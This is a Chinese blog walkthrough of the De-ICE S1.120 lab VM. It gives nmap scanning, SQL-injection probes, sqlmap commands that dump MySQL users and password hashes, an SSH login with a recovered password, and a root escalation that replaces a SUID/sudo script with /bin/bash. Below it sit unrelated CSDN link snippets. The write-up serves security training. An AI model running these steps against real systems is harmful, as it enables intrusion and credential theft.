DE-ICE:S1.120

已于 2024-09-18 21:15:43 修改
阅读量249 收藏 9
点赞数 5
文章标签: 网络安全
于 2024-09-18 21:15:10 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_74214882/article/details/142343991
版权

0x01 项目地址

De-ICE: S1.120

0x02 环境搭建

靶机

DE-ICE:S1.120

仅主机模式 192.168.1.120

攻击机

kali

仅主机模式 192.168.1.129

注:靶机IP默认为静态IP:192.168.1.120,因此kali需设置为仅主机模式,配置为相同网段

0x03 详细步骤

1.主机发现

arp-scan -l

2.端口扫描

nmap -p- 192.168.1.120

可以看到开启了21、22、80、443、3306五个端口

既然开放了80端口,那么我们访问一下web页面

3.Web访问

浏览器访问192.168.1.120,可以看到有HomeAdd ProductView Products三个页面,Home页面即这个首页

Add Product页面是一个表单,可以填写产品名称、描述、价格还有提交按钮

View Products页面可以查看产品

4.漏洞挖掘

Add Product页面添加一个产品

然后在View Products页面查询一下该产品,发现url里带参数id

尝试一下SQL注入,构造payload

?id=1 and 1=1 --+

页面正常

?id=1 and 1=2 --+

页面异常

故可能存在数字型SQL注入

拿sqlmanp跑一下,验证一下

sqlmap -u "http://192.168.1.120/products.php?id=1" --batch

确认存在SQL注入

5.漏洞利用

sqlmap爆库

sqlmap -u "http://192.168.1.120/products.php?id=1" --dbs --batch

mysql库中的表

sqlmap -u "http://192.168.1.120/products.php?id=1" -D mysql --tables --batch

user表中的字段

sqlmap -u "http://192.168.1.120/products.php?id=1" -D mysql -T user --columns --batch

UserPassword字段中的内容

sqlmap -u http://192.168.1.120/products.php?id=1 -D mysql -T user --users --passwords --batch

此外,SQLMAP还将自动执行用户密码的密码破解,最终得到一堆用户名/密码

6.SSH连接

经过一番尝试之后,用ccoffee用户成功登陆(用本机连接kali需要配置)

ccoffee:whatever
ssh ccoffee@192.168.1.120

7.提权

尝试SUID提权

执行命令,枚举SUID权限的二进制文件

find / -perm -u=s -type f 2>/dev/null

这里找到getlogs.sh启用了SUID,可以执行命令

到该目录下,将getlogs.sh备份,并创建一个新的getlogs.sh文件

cd /home/ccoffee/scripts/
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" >  getlogs.sh
chmod 777 getlogs.sh

sudo执行getlogs.sh

sudo /home/ccoffee/scripts/getlogs.sh

提权成功!

mouyu⇔
关注
Vuluhub靶机 De-ICE: S1.120(渗透测试详细)
2301_78721909的博客
07-30 413
Vuluhub靶机 De-ICE: S1.120 (from wuhu)
DE-ICE: S1.120打靶【附POC】(权限提升)
weixin_52487093的博客
07-30 558
1.安装虚拟主机,主机发现不了已解决;2.kali利用ssh连接不了,已找到替补方案;3.SUID提权
Vulnhub靶机系列:De-ICE: S1.120
汗的博客
03-30 1518
https://www.hackingarticles.in/hack-the-de-ice-s1-120-vm-boot-to-root/ 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外i...
De-ICE_S1.120靶机
zdd1453691081的博客
07-29 172
【代码】De-ICE_S1.120靶机。
De-ICE_S1.120靶机渗透测试
weixin_58786230的博客
07-29 371
【代码】De-ICE_S1.120靶机渗透测试。
De-ICE: S1.120
2301_78815619的博客
09-14 406
经过尝试,使用其账户进行SSH登录,最终使用账户:ccoffee 密码:starwars 登录(刚开始已经扫描出了22端口了)dirsearch -u http://192.168.1.120 经过拼接访问,没啥重要信息。靶机默认仅主机网卡IP为192.168.1.120,最好设置一个与靶机同网段的网卡。(1)先切换到/home/ccoffee/scripts目录下。给kali添加一个网卡,并设置为仅主机,并且网段为1。在点击到Add的时候,发现页面跳转到一个提交页面。发现出现了参数,直接SQL注入。
3.DE-ICE: S1.140靶机
Sam5ara的博客
01-16 486
vulnhub
Vulnhub靶机:DE-ICE:S1.120
whoami
09-13 712
Vulnhub靶机:DE-ICE:S1.120实战
vulnhub系列:De-ICE_S1.120靶机
jq_j37的博客
07-30 428
靶机IP为静态IP:192.168.1.120,因此kali设置为仅主机,配置为相同网段。
安装Paddle-ChatDocuments大模型
2301_81887304的博客
01-02 1765
利用LangChain和ChatGLM-6B系列模型制作的Webui, 提供基于本地知识的大模型应用.
WebRTC56版本SDP详细解析
热门推荐
chinabinlang的专栏
01-24 1万+
http://blog.csdn.net/onlycoder_net/article/details/76702432 v=0 //sdp版本号,一直为0,rfc4566规定 o=- 7017624586836067756 2 IN IP4 127.0.0.1 // RFC 4566 o=<username> <sess-id> <sess-versio...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8492
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
用于去噪幅度dMRI的Matlab工具箱.rar
10-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
APP报毒全自动处理系统源码
10-09
APP报毒全自动处理系统源码
智能优化算法-引力搜索优化算法(GSA)(附源码)
10-09
引力搜索优化算法 (Gravitational Search Algorithm, GSA) 是一种基于牛顿万有引力定律的元启发式优化算法,由Rashedi等人于2009年提出。GSA通过模拟天体之间的引力作用来搜索最优解,适用于解决复杂的优化问题。 GSA的工作机制主要包括: 初始化:随机生成一组初始解,每个解代表一个“质量”。 计算引力:根据每个解的质量和距离,计算它们之间的引力。 更新位置:根据引力作用,更新每个解的位置,从而探索解空间。 更新质量:根据解的适应度值,更新每个解的质量,以便更好地指导搜索方向。 优点包括: 全局搜索能力:GSA能够有效地探索解空间的不同区域。 鲁棒性强:适用于多种优化问题,包括连续和离散优化。 易于实现:算法设计直观,易于编程实现。
基于springboot的餐饮管理系统源码+数据库(Java毕业设计)
最新发布
10-09
基于springboot的餐饮管理系统源码+数据库(Java毕业设计),该项目是个人毕设项目,答辩评审分达到98分,代码都经过调试测试,确保可以运行!欢迎下载使用,可用于小白学习、进阶。该资源主要针对计算机、通信、人工智能、自动化等相关专业的学生、老师或从业者下载使用,亦可作为期末课程设计、课程大作业、毕业设计等。项目整体具有较高的学习借鉴价值!基础能力强的可以在此基础上修改调整,以实现不同的功能。 基于springboot的餐饮管理系统源码+数据库(Java毕业设计),该项目是个人毕设项目,答辩评审分达到98分,代码都经过调试测试,确保可以运行!欢迎下载使用,可用于小白学习、进阶。该资源主要针对计算机、通信、人工智能、自动化等相关专业的学生、老师或从业者下载使用,亦可作为期末课程设计、课程大作业、毕业设计等。项目整体具有较高的学习借鉴价值!基础能力强的可以在此基础上修改调整,以实现不同的功能。 基于springboot的餐饮管理系统源码+数据库(Java毕业设计),该项目是个人毕设项目,答辩评审分达到98分,代码都经过调试测试,确保可以运行!欢迎下载使用,可用于小白学习、进阶。该
Python中的“异常的引发”:掌握编程中的“艺术”.pdf
10-09
在软件开发过程中,无论是初学者还是资深工程师,都可能遇到各种各样的问题。这些问题如果得不到妥善处理,轻则导致程序运行不稳定,重则引发系统崩溃。而“异常的引发”则是Python提供给我们的一种强有力的工具,它帮助我们在程序执行过程中主动识别并报告错误情况,从而使得我们可以及时采取措施来修复问题或者以一种更加优雅的方式告知用户。
cd C:\Program Files\FlightGear fgfs --fg-root=C:\Program Files\FlightGear\data --aircraft=ufo --in-air --fdm=null --telnet=5501 --telnet=5502 --telnet=5503 --disable-ai-traffic --disable-real-weather-fetch --disable-random-objects --disable-terrasync --disable-clouds --disable-sound --disable-panel --disable-hud --disable-specular-highlight --timeofday=noon --prop:/sim/rendering/multi-sample-buffers=1 --prop:/sim/rendering/multi-samples=2 --prop:/sim/rendering/draw-mask-clouds=false --prop:/sim/rendering/draw-mask-terrain=true --prop:/sim/rendering/draw-mask-objects=true --prop:/sim/rendering/draw-mask-lights=true --prop:/sim/rendering/draw-mask-internal=true --prop:/sim/rendering/draw-mask-cockpit=true --prop:/sim/rendering/draw-mask-effects=true --prop:/sim/rendering/draw-mask-overlay=true --prop:/sim/rendering/draw-mask-world=true --prop:/sim/rendering/draw-mask-panel=true --prop:/sim/rendering/draw-mask-vr=true --prop:/sim/rendering/draw-mask-2d=true --prop:/sim/rendering/draw-mask-3d=true --prop:/sim/rendering/draw-mask-sky=true --prop:/sim/rendering/draw-mask-shadows=true --prop:/sim/rendering/draw-mask-cabin=true --prop:/sim/rendering/draw-mask-weather=true --prop:/sim/rendering/draw-mask-stereo=true --prop:/sim/rendering/draw-mask-internal-cockpit=true --prop:/sim/rendering/draw-mask-internal-windows=true --prop:/sim/rendering/draw-mask-internal-instruments=true --prop:/sim/rendering/draw-mask-internal-overlay=true --prop:/sim/rendering/draw-mask-internal-effects=true --prop:/sim/rendering/draw-mask-internal-lights=true --prop:/sim/rendering/draw-mask-internal-world=true --prop:/sim/rendering/draw-mask-internal-panel=true --prop:/sim/rendering/draw-mask-internal-3d=true --prop:/sim/rendering/draw-mask-internal-sky=true --prop:/sim/rendering/draw-mask-internal-cabin=true --prop:/sim/rendering/draw-mask-internal-weather=true --prop:/sim/rendering/draw-mask-internal-stereo=true --prop:/sim/rendering/draw-mask-internal-shadow=true --prop:/sim/rendering/draw-mask-internal-stall=true --prop:/sim/rendering/draw-mask-internal-aoa=true --prop:/sim/rendering/draw-mask-internal-thermal=false --prop:/sim/rendering/draw-mask-internal-ice=false --prop:/sim/rendering/draw-mask-internal-glass=true --prop:/sim/rendering/draw-mask-internal-dead=true --prop:/sim/rendering/draw-mask-internal-reflection=true程序显示错误unknown command-line option: enable-hud-2d怎么解决
05-10
-disable-random-objects --disable-terrasync --disable-clouds --disable-sound --disable-panel --timeofday=noon --prop:/sim/rendering/multi-sample-buffers=1 --prop:/sim/rendering/multi-samples=2 --prop:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值